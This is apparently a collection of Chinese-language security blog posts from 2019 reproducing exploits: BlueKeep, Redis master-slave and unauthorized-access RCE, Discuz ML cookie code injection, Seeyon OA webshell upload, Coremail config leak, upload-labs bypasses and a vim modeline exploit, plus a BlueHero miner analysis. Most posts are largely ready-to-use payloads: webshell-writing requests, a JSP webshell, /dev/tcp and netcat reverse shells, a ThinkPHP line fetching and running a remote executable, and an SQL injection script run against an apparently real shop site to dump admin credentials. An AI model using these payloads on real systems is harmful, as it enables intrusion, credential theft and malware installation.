CVE-2019-0708 RDP RCE漏洞重现(20190907-MSF-EXP)

0x00 概述 前情提要RDP RCE(CVE-2019-0708)集锦 20190907 msf更新cve-2019-0708的exp,瞬间一片震动,经测试,该exp在特定条件下可用。   0x01 影响范围 Target: 0 Automatic targeting via fingerprinting 1 Windows 7 SP1 / 2008 R2 (6.1.7601 x64) 2 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 – Virtualbox) 3 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 – VMWare) 4 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 – Hyper-V)   0x02 漏洞重现 1.环境:msf5.0.46dev,vm12.5.7,nat,win7旗舰版x64sp1-7601(cn_windows_7_ultimate_with_sp1_x64_dvd_u_677408.iso)开启3389,reload_all 修改后的4个rb文件,target 2。 cve_2019_0708_bluekeep_rce.rb 添加 /usr/share/metasploit-framework/modules/exploits/windows/rdp/ rdp.rb 替换 /usr/share/metasploit-framework/lib/msf/core/exploit/rdp.rb rdp_scanner.rb 替换 /usr/share//metasploit-framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb cve_2019_0708_bluekeep.rb 替换 /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb 2. 环境 cn_windows_server_2008_r2_standard_enterprise_datacenter_and_web_with_sp1_x64_dvd_617598.iso 不改注册表   修改注册表 //HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Terminal Server\WinStations\rdpwd\fDisableCam为0 未发现该注册表键值,手动增加并设置0 还是蓝屏   注: 2008r2withsp1 english standard需要修改注册表[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Terminal Server\WinStations\rdpwd\fDisableCam]值修改为0。 打一次要重启靶机一次否则可能会失败。 Windows 2008 r2据说很多都蓝屏…… 更新msf到最新。 调低核心数如2核心2g/1核1g……(多核竞争?) 关闭自动更新防止自动打补丁影响测试。   0x03 结语 目前这个exp如果要利用成功,限制过多,如操作系统版本号,平台,安全设备等诸多因素会影响,估计实战成功率不高,不过这已经是一个大飞跃,预计不久后会有更完善的exp出现。 蠕虫正步步紧逼……   0x04 参考资料 https://github.com/rapid7/metasploit-framework/pull/12283 https://blog.rapid7.com/2019/09/06/initial-metasploit-exploit-module-for-bluekeep-cve-2019-0708/

利用redis主从进行RCE

0x00 概述 redis常见利用未授权访问漏洞,参考redis未授权访问漏洞利用 现在还可以利用redis的主从特性进行RCE,详情参考ppt 影响redis4和5。   0x01 重现 环境: 受害机: docker run –name redis5-alpine -d -v $PWD:/data –restart=always -p 6379:6379 hareemca123/redis5:alpine 或者 docker run –name redis4-6379 -p 6379:6379 -d redis:4.0 攻击机: 利用脚本 https://github.com/jas502n/Redis-RCE   0x02 原理 主从握手机制见下图 //此图源自网络 攻击大概流程: 创建一个恶意的redis服务器master,用来发送执行命令的module(exp_lin.so) 关键代码: def handle(self, data): resp = “” phase = 0 if data.find(“PING”) > -1: resp = “+PONG” + CLRF phase = 1 elif data.find(“REPLCONF”) > -1: resp = “+OK” + CLRF phase = 2 elif data.find(“PSYNC”) > -1 or data.find(“SYNC”) > -1: resp = “+FULLRESYNC ” + “Z” * 40 + ” 0″ + CLRF resp += “$” + str(len(payload)) + CLRF resp = resp.encode() resp += payload + CLRF.encode() phase = 3 return resp, phase 2. 在受害redis上将恶意redis设置为master:SLAVEOF vps port。 关键代码: print(“[*] Sending SLAVEOF command to server”) remote.do(“SLAVEOF {} {}”.format(lhost, lport)) back = remote._sock.getsockname() print(“\033[92m[+]\033[0m Accepted connection from {}:{}”.format(back[0], back[1])) 3. 在受害redis设置dbfilename和dir。 关键代码: print(“[*] Setting filename”) remote.do(“CONFIG SET dir /tmp/”) remote.do(“CONFIG SET dbfilename {}”.format(expfile)) 4. 通过同步将module写入受害redis磁盘上:+FULLRESYNC <Z*40> 1\r\n$<len>\r\n<payload> 关键代码: class RogueServer: def __init__(self, lhost, lport): self._host = lhost self._port =……

discuz ml RCE漏洞重现及分析

0x00 概述 7月11日,在网上发现discuz ml(多国语言版)出现RCE漏洞的消息,漏洞在于cookie的language可控并且没有严格过滤,导致可以远程代码执行。   0x01 影响范围 Discuz!ML v.3.4 , Discuz!ML v.3.2 , Discuz!ML v.3.3 product of codersclub.org   0x02 漏洞重现 http://xxx.org/discuzx/portal.php select english or other language   让请求cookie含有xxxx_xxxx_language visit http://xxx.org/discuzx/portal.php again change:4gH4_0df5_language=en’.phpinfo().’; or 4gH4_0df5_language=en’.system(‘whoami&&pwd’).’;   getshell LSmZ_2132_language=es’.file_put_contents%28%27xxxxxxx.php%27%2Curldecode%28%27%253c%253fphp%2520@eval%28%2524_%25%35%30%25%34%66%25%35%33%25%35%34%255b%2522x%2522%255d%29%253b%253f%253e%27%29%29.’;     0x03 检测工具 https://github.com/theLSA/discuz-ml-rce   0x04 漏洞分析 Discuz ml v3.4 为例 dizcuz-ml-34\upload\source\module\portal\portal_index.php:32 include_once template(‘diy:portal/index’); 包含了template函数渲染的文件 进入template函数看看 dizcuz-ml-34\upload\source\function\function_core.php:524 /*vot*/ $cachefile = ‘./data/template/’.DISCUZ_LANG.’_’.(defined(‘STYLEID’) ? STYLEID.’_’ : ‘_’).$templateid.’_’.str_replace(‘/’, ‘_’, $file).’.tpl.php’; if($templateid != 1 && !file_exists(DISCUZ_ROOT.$tplfile) && !file_exists(substr(DISCUZ_ROOT.$tplfile, 0, -4).’.php’) && !file_exists(DISCUZ_ROOT.($tplfile = $tpldir.$filebak.’.htm’))) { $tplfile = ‘./template/default/’.$filebak.’.htm’; } if($gettplfile) { return $tplfile; } checktplrefresh($tplfile, $tplfile, @filemtime(DISCUZ_ROOT.$cachefile), $templateid, $cachefile, $tpldir, $file); return DISCUZ_ROOT.$cachefile; 返回了缓存文件名 根据poc可知是language可控,那就是DISCUZ_LANG可控了。 再看看在哪里赋值 dizcuz-ml-34\upload\source\class\discuz\discuz_application.php:304 // set language from cookies   if($this->var[‘cookie’][‘language’]) {   $lng = strtolower($this->var[‘cookie’][‘language’]); 从cookie-language取值给$lng 338 $this->var[‘oldlanguage’] = $lng; // Store Old Language Value for compare   // define DISCUZ_LANG define(‘DISCUZ_LANG’, $lng);   // set new language to cookie dsetcookie(‘language’, $lng);   // set new language variables $this->var[‘language’] = $lng; $lng赋值给了DISCUZ_LANG 根据poc q3KZ_2132_language=sc’.system(‘whoami’).’; 最终include_once ‘sc’.system(‘whoami’).’_1_1_common_header_forum_index.tpl.php’; 包含闭合引号导致执行了代码。 /× 执行代码这部分存疑,参考https://www.anquanke.com/post/id/181887 ×/   0x05 防御方案 1. 关注 https://bitbucket.org/vot/discuz.ml/commits/all 2.过滤特殊字符(串)如单引号、双引号、括号,点,system、php、eval等。 3.禁止可控变量DISCUZ_LANG作为缓存文件名的一部分。   0x06 结语 Easy to rce!……

记一次mssql注入历程

0x00 发现 目标使用hishop,查看历史漏洞发现一处注入: http://mall.xxx.com.cn/user/UserRefundApply?OrderId=%27%20and%20(select%20@@version)%3E0%20and%20%271%27=%271   db_name():xxxshop017 user:xxxx017 @@servername:XXXSHOP   0x01 郁闷的爆表名 那就开始爆xxxshop017的表吧 http://mall.xxx.com.cn/user/UserRefundApply?OrderId=%27%20and%20(select%20top%201%20name%20from%20sysobjects%20where%20xtype=%27u%27%20and%20name%20not%20in%20(%27Hishop_HelpCategories%27))%3E0%20and%20%271%27=%271 /× 也可以利用information_schema爆表 http://mall.xxx.com.cn/user/UserRefundApply?OrderId=%27%20and%201=(select%20top%201%20table_name%20from%20information_schema.tables%20);– ×/ 写个脚本跑表 #coding:utf-8 #Author:LSA #Description:hishop sqli for /user/UserRefundApply?OrderId= #Date:20190701 import sys import requests from bs4 import BeautifulSoup import re headers = { ‘Cookie’: ”, ‘User-Agent’: ‘Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36’ } global tables_name tables_name = “‘Hishop_HelpCategories'” #print tables_name def brute_tables(url): for i in range(0,300): url = ‘http://mall.xxx.com.cn/user/UserRefundApply?OrderId=%27%20and%20(select%20top%201%20name%20from%20sysobjects%20where%20xtype=%27u%27%20and%20name%20not%20in%20(‘ + tables_name + ‘))%3E0%20and%20%271%27=%271’ print url rsp = requests.get(url,headers=headers) soup = BeautifulSoup(rsp.text,”lxml”) title = soup.title.string #print title table_name = re.findall(r”‘(.*?)'”,title) #print table_name[0] global tables_name tables_name = tables_name + ‘,\” + table_name[0] + ‘\” #print tables_name print tables_name def main(url): brute_tables(url) if __name__ == ‘__main__’: url = ‘http://mall.xxx.com.cn/user/UserRefundApply?OrderId=%27%20and%20(select%20top%201%20name%20from%20sysobjects%20where%20xtype=%27u%27%20and%20name%20not%20in%20(‘ + tables_name + ‘))%3E0%20and%20%271%27=%271’ main(url) 郁闷开始了,竟然报错了! 经测试,是因为url长度超过2093返回404了,利用burp和chrome都是相同情况,目标系统iis8.5+.net4,在使用相同hishop的另外一个网站(iis7.5)测试不会404…… 猜测可能是运维修改了IIS最大url长度,但是可能性非常低! 无奈,利用xml path爆吧 利用xml path()爆所有表 http://mall.xxx.com.cn/user/UserRefundApply?OrderId=%27%20and%201=convert(int,(select%20quotename(name)%20from%20xxxshop017..sysobjects%20where%20xtype=%27U%27%20FOR%20XML%20PATH(%27%27)))%20and%20%271%27=%271   由于表名太多,最后出现省略号,无法爆完所有表。   那就利用not in分两次爆,把第一次用xml path爆出来的表名加入not in。 http://mall.xxx.com.cn/USER/UserRefundApply?OrderId=%27%20and%201=CONVERT(INT,(select%20quotename(name)%20from%20xxxshop017..sysobjects%20where%20xtype=%27U%27%20and%20name%20not%20in%20(%27Hishop_HelpCategories%27,%27Hishop_Hotkeywords%27,%27Hishop_OrderDailyStatistics%27,%27Hishop_CountDownSku%27,%27Hishop_Helps%27,%27Hishop_NavMenu%27,%27Hishop_Gifts%27,%27Hishop_ProductConsultations%27,%27Hishop_MessageTemplates%27,%27CustomMade_Logs%27,%27Hishop_FriendlyLinks%27,%27Hishop_ProductAttributes%27,%27Hishop_MessageContent%27,%27Hishop_FightGroupActivities%27,%27Hishop_PointDetails%27,%27Hishop_MemberMessageBox%27,%27Hishop_FavoriteTags%27,%27Hishop_InpourRequest%27,%27Hishop_ExpressTemplates%27,%27Hishop_ManagerMessageBox%27,%27Hishop_SKUMemberPrice%27,%27Hishop_EmailQueue%27,%27Hishop_SKUItems%27,%27Hishop_DeliveryScope%27,%27Hishop_MenuClickRecords%27,%27Hishop_UserShippingAddresses%27,%27Hishop_DailyAccessStatistics%27,%27Hishop_Logs%27,%27Hishop_ShoppingCarts%27,%27Hishop_Coupons%27,%27Hishop_IntegrationSettings%27,%27Hishop_ProductPreSale%27,%27Hishop_GiftShoppingCarts%27,%27Hishop_PhotoGallery%27,%27Hishop_PromotionRegions%27,%27Hishop_ProductDailyAccessStatistics%27,%27Hishop_Favorite%27,%27Hishop_PhotoCategories%27,%27Hishop_MarketingImages%27,%27Hishop_PhoneCodeIPs%27,%27Hishop_PhoneCodeEveryDayTimes%27,%27Hishop_PrivilegeInRoles%27,%27aspnet_Referrals%27,%27Hishop_PaymentTypes%27,%27Hishop_ProductSpecificationImages%27,%27aspnet_MemberOpenIds%27,%27Hishop_Orders%27,%27Hishop_Products%27,%27Hishop_BalanceDrawRequest%27,%27aspnet_Roles%27,%27Hishop_Shippers%27,%27Hishop_BalanceDetails%27,%27ChangeStockLog%27,%27Hishop_Service%27,%27aspnet_MemberGrades%27,%27Hishop_RelatedProducts%27,%27aspnet_OpenIdSettings%27,%27Custom_Etickets%27,%27Hishop_RelatedArticsProducts%27,%27aspnet_MemberWXShoppingGuider%27,%27Hishop_Regions%27,%27aspnet_MemberWXReferral%27,%27Custom_EticketsResult%27,%27Hishop_RedEnvelopeSendRecord%27,%27aspnet_MemberTags%27,%27Hishop_RedEnvelopeGetRecord%27,%27Hishop_CombinationBuySKU%27)FOR%20XML%20PATH(%27%27)))%20and%20%271%27=%271       0x02 获取列名和数据 判断管理员帐号密码可能在 aspnet_Members或aspnet_Managers这两个表中 先看aspnet_Members http://mall.xxx.com.cn/user/UserRefundApply?OrderId=%27%20and%201=(select%20top%201%20*%20from%20xxxshop017..aspnet_Members%20FOR%20XML%20PATH(%27%27))–   得到帐号admin密码xxx2018@ 利用where、not in可以获取多个数据 有些帐号的密码经过了加密(疑似RSA) <Password>dNPQ/7vfChaeOmCL7Wb8mRmRq9U=</Password><PasswordSalt>5pk/VC1CM8ARImoqpquGpg==</PasswordSalt> 再看看aspnet_Managers http://mall.xxx.com.cn/user/UserRefundApply?OrderId=%27%20and%201=(select%20top%201%20*%20from%20xxxshop017..aspnet_Managers%20FOR%20XML%20PATH(%27%27))–   密码base16/32/64无法解密 疑似经过了rsa加密。   利用admin xxx2018@登录失败。 猜测可能是数据库不对,尝试爆所有数据库。 利用xml paht()爆所有库 http://mall.xxx.com.cn/USER/UserRefundApply?OrderId=%27%20and%20(select%20quotename(name)%20from%20master..sysdatabases%20FOR%20XML%20PATH(%27%27))%3E0%20and%20%271%27=%271   得到可能存在帐号密码的数据库(域名是mall) [xxxmall] 尝试跨库查询 http://mall.xxx.com.cn/user/UserRefundApply?OrderId=%27%20and%201=convert(int,(select%20quotename(name)%20from%20xxxmall..sysobjects%20where%20xtype=%27U%27%20FOR%20XML%20PATH(%27%27)))%20and%20%271%27=%271……

致远oa(seeyon)文件上传漏洞重现

0x00 影响范围 经本人测试,如下 v6.1sp2 a6+v7sp3 A8-v5 v6.1sp1 实际范围不止以上版本。 0x01 漏洞重现 验证: POC: //根据exp1修改 a6+v7sp3 发送数据包: POST /seeyon/htmlofficeservlet HTTP/1.1 Host: xxx.com.cn Pragma: no-cache Cache-Control: no-cache Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Cookie: JSESSIONID=AD5D04D5A82032FCB3C91028ADF9F839; loginPageURL= Connection: close Content-Length: 462   DBSTEP V3.0 345 0 21 DBSTEP=OKMLlKlV OPTION=S3WYOSWLBSGr currentUserId=zUCTwigsziCAPLesw4gsw4oEwV66 CREATEDATE=wUghPB3szB3Xwg66 RECORDID=qLSGw4SXzLeGw4V3wUw3zUoXwid6 originalFileId=wV66 originalCreateDate=wUghPB3szB3Xwg66 FILENAME=qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdbrJuz7T2dEg6 needReadFile=yRWZdAS6 originalCreateDate=wLSGP4oEzLKAz4=iz=66 only-test-seeyon-rcexxxxxx   EXP0: 传Cknife马 v6.1sp2 POST /seeyon/htmlofficeservlet HTTP/1.1 Host: 58.1.1.2:81 Pragma: no-cache Cache-Control: no-cache Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Cookie: JSESSIONID=0d218993-e7c3-4caa-8281-42c886e5f42c; loginPageURL=”” Connection: close Content-Length: 9540   DBSTEP V3.0 348 0 9122 DBSTEP=OKMLlKlV OPTION=S3WYOSWLBSGr currentUserId=zUCTwigsziCAPLesw4gsw4oEwV66 CREATEDATE=wUghPB3szB3Xwg66 RECORDID=qLSGw4SXzLeGw4V3wUw3zUoXwid6 originalFileId=wV66 originalCreateDate=wUghPB3szB3Xwg66 FILENAME=qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdeAD5cfT2dEg6 needReadFile=yRWZdAS6 originalCreateDate=wLSGP4oEzLKAz4=iz=66 <%@page import=”java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*”%> <%! String Pwd = “x”; String cs = “UTF-8”;   String EC(String s) throws Exception { return new String(s.getBytes(“ISO-8859-1”),cs); }   Connection GC(String s) throws Exception { String[] x = s.trim().split(“choraheiheihei”); Class.forName(x[0].trim()); if(x[1].indexOf(“jdbc:oracle”)!=-1){ return DriverManager.getConnection(x[1].trim()+”:”+x[4],x[2].equalsIgnoreCase(“[/null]”)?””:x[2],x[3].equalsIgnoreCase(“[/null]”)?””:x[3]); }else{ Connection c = DriverManager.getConnection(x[1].trim(),x[2].equalsIgnoreCase(“[/null]”)?””:x[2],x[3].equalsIgnoreCase(“[/null]”)?””:x[3]); if (x.length > 4) { c.setCatalog(x[4]);……

coremail 配置信息泄露及接口未授权漏洞重现

0x00 配置信息泄漏 POC: mailsms/s?func=ADMIN:appState&dumpConfig=/ 可以获取数据库配置信息和推送账号。 有些可能限制ip。 可以进入后台管理。 有些是404,可能打了补丁或者是老漏洞了,也可能是版本问题。 0x01 webservice接口未授权   进一步获取数据失败。      

bluehero挖矿蠕虫新变种v20190604简单分析

0x00 概述 捕获到利用thinkphp5 rce漏洞的攻击记录,经分析为bluehero新变种,编译时间为20190604。 attack:http://1.2.3.4:80/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^<?php $action = $_GET[‘xcmd’];system($action);?^>>hydra.php; attack:http://1.2.3.4:80/public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile(‘http://fid.hognoob.se/download.exe’,’SystemRoot/Temp/wtrgaltqtqzkxtb28962.exe’);start SystemRoot/Temp/wtrgaltqtqzkxtb28962.exe;   0x01 逆向分析 download.exe: SHA256:6180a1db3b1267eec5fba215be7696435bcb746a34b3b8692c99554e9edbe68b upx脱壳 upx.exe -d “” -o “” 编译时间戳 2019-06-04 04:26:51 PEID PE: packer: UPX(3.94)[NRV,brute] PE: compiler: Microsoft Visual C/C++(6.0)[-] PE: linker: Microsoft Linker(6.0)[EXE32] 入口所在段 UPX1 镜像基地址 0x400000 入口点(OEP) 0x4dcc0   下载母体文件 存储到%SystemRoot%\Temp\SunloglicySrv.exe。 SunloglicySrv.exe upx脱壳 下载配置 http://uio.hognoob.se:63145/cfg.ini 生成ip段 获取本地IP地址,访问http://2019.ip138.com/ic.asp 获取所在公网ip,将生成的ip段包括所在公网的B段,以及随机生成的公网地址保存为ip.txt,启动端口扫描工具对ip的139/445端口进行扫描,将扫描结果保存到result.txt。 用masscan扫描内网和外网的端口 永恒之蓝攻击(32/64)    cve-2019-2725攻击   ipc$爆破 利用内置密码字典进行ipc$远程爆破,爆破登录成功后在目标机器利用psexec工具或者wmic执行远程命令植入木马程序。 cve-2017-5638攻击 cve-2017-10271攻击 好像和2725用的是相同的payload。 thinkphp5 rce攻击 tomcat put 攻击 0x02 流量分析 download.exe SunloglicySrv.exe下载cfg.ini 爆破mssql-1433 0x03 行为分析 SystemRoot/Temp/wtrgaltqtqzkxtb28962.exe(即download.exe) 运行后自删除,并释放后门文件ucokcu.exe(随机六字母文件名) 该程序没有图标,没文件名,具有隐蔽性,后门程序作为系统服务启动。   download.exe下载病毒母体SunloglicySrv.exe 写入到C:\webkitssdk\2.7.92\目录下(不确定是SunloglicySrv.exe还是ucokcu.exe,按微步的沙箱看应该是ucokcu.exe) 木马后门黑客服务器ip。 SunloglicySrv.exe 下载挖矿配置cfg.ini 释放一堆文件: zunnrhu.exe和SunloglicySrv.exe基本一样,含有多种攻击模块。 ipc$爆破,利用mimikatz读取密码。 疑似端口扫描程序。 永恒之蓝。 cve-2017-8464。 生成ip段 利用procdump和psexec。 矿机程序,xmrig挖门罗币。 upx脱壳 矿池 添加计划任务。 添加服务。 攻击7001,weblogic漏洞。 连接黑客服务器80.82.70.188:35791(远控) 相关进程。 0x04 关联分析 fid.hognoob.se 注册时间2019-03-01 00:00:00 过期时间2020/3/1 0:00:00 45.67.14.164(英国 英格兰 伦敦) 21/tcp   open   ftp            Pure-FTPd 80/tcp   open   http           nginx 9898/tcp open   http           Ajenti http control panel fid.hognoob.se服务器iP: 当前解析: 英国45.67.14.164 历史解析记录: 2019-05-15—–2019-06-1445.67.14.164 2019-05-08—–2019-05-08195.128.124.189 2019-04-27—–2019-04-28195.128.124.159 2019-04-15—–2019-04-18195.128.127.237 2019-04-01—–2019-04-1145.67.14.168 2019-03-17—–2019-03-19195.128.127.254 2019-03-13—–2019-03-1345.79.66.44 bt宝塔面板 45.67.14.164 英国 英格兰 伦敦 运营商:pitcommunications.net 195.128.124.140 XMRCoinMiner挖矿木马 运营商:inoventica.ru 俄罗斯莫斯科   80.82.70.234 荷兰 阿姆斯特丹Ecatel公司   185.164.72.143 iis7.5 猜测攻击者应该是欧洲的。   0x05 IOC http://fid.hognoob.se/download.exe(45.67.14.164)//19日更改解析ip(80.82.70.234)//22日更改解析为127.0.0.1/185.164.72.143(荷兰北阿姆斯特丹/伊朗) SHA-256: 6180a1db3b1267eec5fba215be7696435bcb746a34b3b8692c99554e9edbe68b http://fid.hognoob.se/SunloglicySrv.exe SHA-256: e5f1244002929418a08d4623b7de39ccf591acb868d0e448ed4f7174d03c2c81 http://uio.hognoob.se:63145/cfg.ini(45.67.14.166) 195.128.124.140  ……

redis未授权访问漏洞利用

0x00 基本命令 还有flushall 修改相关配置以重现漏洞 config: redis.windows.conf: bind 0.0.0.0 Protected-mode no redis-server.exe “redis.windows.conf” /* redis持久化存储 dump.rdp文件: RDB可以将某一时刻的所有数据写入硬盘中,通过RDB文件,可以将redis数据恢复到某一历史时刻(snapshots)。   save/bgsave save 900 1 save 300 10 save 60 10000 — AOF会在redis执行写命令时,将被执行的写命令复制到磁盘aof文件中,恢复数据的时候,redis会在原有基础上依次执行AOF文件中的写命令,从而恢复数据。   appendonly yes appendfilename “appendonly.aof” appendfsync everysec */ 0x01 反弹shell 192.168.138.129:6379> set x “\n* * * * * bash -i >& /dev/tcp/192.168.43.237/7788 0>&1\n” OK 192.168.138.129:6379> config set dir /var/spool/ OK 192.168.138.129:6379> config set dbfilename root OK 192.168.138.129:6379> save 未能成功反弹,原因可能是debian,ubuntu的计划任务的格式很严格,须执行 crontab -u root /var/spool/cron/crontabs/root 通过语法检查才能执行计划任务。 也可能是权限或格式(不能有其他脏字符)问题。 只有centos能成功。   0x02 添加ssh key 或者 cat sshpubkey.txt | redis-cli -h 192.168.138.129 -x set x $ redis-cli -h 192.168.138.129 $ 192.168.138.129:6379> config set dir /root/.ssh/ OK $ 192.168.138.129:6379> config get dir 1) “dir” 2) “/root/.ssh” $ 192.168.138.129:6379> config set dbfilename “authorized_keys” OK $ 192.168.138.129:6379> save OK   0x03 Web目录写webshell 192.168.43.237:6379> config set dir D:\phpStudy\WWW\ OK 192.168.43.237:6379> config set dbfilename redishell.php OK 192.168.43.237:6379> set rs “<?php @eval($_POST[x]);?>” OK 192.168.43.237:6379> save   0x04 防御方案 1. 加密码 redis.conf: requirepass mypassword   2. 本地访问: redis.conf: bind 127.0.0.1   3. 改权限 chmod 400 ~/.ssh/authorized_keys chattr +i ~/.ssh/authorized_keys chattr +i ~/.ssh    

upload-labs攻略(Pass01-20)

0x00 概述 很好的一个练习上传漏洞的项目https://github.com/c0ny1/upload-labs 先来个黑名单 array( “.php”,”.php5″,”.php4″,”.php3″,”.php2″,”php1″, “.html”,”.htm”,”.phtml”,”.pht”,”.pHp”,”.pHp5″,”.pHp4″,”.pHp3″, “.pHp2″,”pHp1″,”.Html”,”.Htm”,”.pHtml”,”.jsp”,”.jspa”,”.jspx”, “.jsw”,”.jsv”,”.jspf”,”.jtml”,”.jSp”,”.jSpx”,”.jSpa”,”.jSw”, “.jSv”,”.jSpf”,”.jHtml”,”.asp”,”.aspx”,”.asa”,”.asax”,”.ascx”, “.ashx”,”.asmx”,”.cer”,”.aSp”,”.aSpx”,”.aSa”,”.aSax”,”.aScx”, “.aShx”,”.aSmx”,”.cEr”,”.sWf”,”.swf”,”.htaccess” );   0x01 安装 kali(linux) docker pull c0ny1/upload-labs docker run -d -p 80:80 c0ny1/upload-labs:latest //点击清空上传文件以创建upload文件夹,手动创建会上传出错! or win7(推荐在win下耍) phpstudy(php5.2.17)+upload-labs:master   0x02 Pass01-20解题方案 Pass01 js客户端绕过,直接burp抓包改php后缀上传即可   Pass02 在服务端对数据包的MIME进行检查 if (($_FILES[‘upload_file’][‘type’] == ‘image/jpeg’) || ($_FILES[‘upload_file’][‘type’] == ‘image/png’) || ($_FILES[‘upload_file’][‘type’] == ‘image/gif’)) { $temp_file = $_FILES[‘upload_file’][‘tmp_name’]; $img_path = UPLOAD_PATH . ‘/’ . $_FILES[‘upload_file’][‘name’] if (move_uploaded_file($temp_file, $img_path)) { 抓包改mime为image/jpeg即可或直接用Pass01的方法   Pass03 黑名单禁止上传.asp|.aspx|.php|.jsp后缀文件 if (file_exists(UPLOAD_PATH)) { $deny_ext = array(‘.asp’,’.aspx’,’.php’,’.jsp’); $file_name = trim($_FILES[‘upload_file’][‘name’]); $file_name = deldot($file_name);//删除文件名末尾的点 $file_ext = strrchr($file_name, ‘.’); $file_ext = strtolower($file_ext); //转换为小写 $file_ext = str_ireplace(‘::$DATA’, ”, $file_ext);//去除字符串::$DATA $file_ext = trim($file_ext); //收尾去空   if(!in_array($file_ext, $deny_ext)) { $temp_file = $_FILES[‘upload_file’][‘tmp_name’]; $img_path = UPLOAD_PATH.’/’.date(“YmdHis”).rand(1000,9999).$file_ext; if (move_uploaded_file($temp_file,$img_path)) { 黑名单,用php3/4/5即可,默认不解析php3/phtml;那就覆盖.htaccess,会重命名加上了时间戳;%aa用url解码也失败;conn2.php:jpg(如果成功再发送conn2.<<<就可以覆盖文件,利用windows系统特性)失败;.::$DATA失败; 在mime.type直接添加 application/x-httpd-php          phtml pht php3 php 再上传conn2.php3即可 或者尝试 httpd.conf AddType Application/x-httpd-php .php .php3 .php5 .phtml 再上传conn2.phtml就可以解析了。   Pass04 黑名单禁了一堆后缀。 if (file_exists(UPLOAD_PATH)) { $deny_ext = array(“.php”,”.php5″,”.php4″,”.php3″,”.php2″,”php1″,”.html”,”.htm”,”.phtml”,”.pht”,”.pHp”,”.pHp5″,”.pHp4″,”.pHp3″,”.pHp2″,”pHp1″,”.Html”,”.Htm”,”.pHtml”,”.jsp”,”.jspa”,”.jspx”,”.jsw”,”.jsv”,”.jspf”,”.jtml”,”.jSp”,”.jSpx”,”.jSpa”,”.jSw”,”.jSv”,”.jSpf”,”.jHtml”,”.asp”,”.aspx”,”.asa”,”.asax”,”.ascx”,”.ashx”,”.asmx”,”.cer”,”.aSp”,”.aSpx”,”.aSa”,”.aSax”,”.aScx”,”.aShx”,”.aSmx”,”.cEr”,”.sWf”,”.swf”); $file_name = trim($_FILES[‘upload_file’][‘name’]); $file_name = deldot($file_name);//删除文件名末尾的点 $file_ext = strrchr($file_name, ‘.’); $file_ext = strtolower($file_ext); //转换为小写 $file_ext = str_ireplace(‘::$DATA’, ”, $file_ext);//去除字符串::$DATA $file_ext = trim($file_ext); //收尾去空   if (!in_array($file_ext, $deny_ext)) { $temp_file = $_FILES[‘upload_file’][‘tmp_name’]; $img_path =……

microsoft notepad和linux vim/neovim的RCE漏洞

0x00 notepad rce 20190528,Google Project Zero研究员Tavis Ormandy宣布在微软的记事本中发现代码执行漏洞。 从他发布的图片看有看出,成功在记事本进程下启动cmd shell。 由于漏洞披露原则,暂未公开具体漏洞细节。   0x01 vim/neovim rce 1周后,20190604,vim也被曝出rce…… 名为Arminius的安全研究员发现vim/neovim的本地任意代码执行漏洞,poc和exp已公开: 影响范围:Vim < 8.1.1365, Neovim < 0.3.6 https://github.com/numirias/security/blob/master/doc/2019-06-04_ace-vim-neovim.md //建议直接用原作者的poc和exp,复制和修改可能会失败! POC: poc.txt :!uname -a||” vi:fen:fdm=expr:fde=assert_fails(“source\!\ \%”):fdl=0:fdt=”   :set modeline $ vim poc.txt EXP: exp.txt: \x1b[?7l\x1bSNothing here.\x1b:silent! w | call system(\’nohup nc 127.0.0.1 7766 -e bash &\’) | redraw! | file | silent! # ” vim: set fen fdm=expr fde=assert_fails(\’set\\ fde=x\\ \\|\\ source\\!\\ \\%\’) fdl=0: \x16\x1b[1G\x16\x1b[KNothing here.”\x16\x1b[D \n //这里用cat还是能看出来一点exp,可能是编辑器或者win7系统的原因 打开即可成功反弹shell,并覆写文件以隐藏,cat exp.txt看不出(加-v可以看出)     0x02 修复方案   vim补丁8.1.1365 https://github.com/vim/vim/commit/5357552 neovim补丁(在v0.3.6中发布) https://github.com/neovim/neovim/pull/10082 https://github.com/neovim/neovim/releases/tag/v0.3.6   在vimrc中禁用modeline(设置nomodeline),使用securemines插件,或禁用modelineexpr(从8.1.1366补丁开始,仅支持vim)以禁用modeline中的表达式。   0x03 结语 钓鱼妙招!   0x04 参考资料 https://mp.weixin.qq.com/s/f4s7x5MciLDFirSNLlBh3Q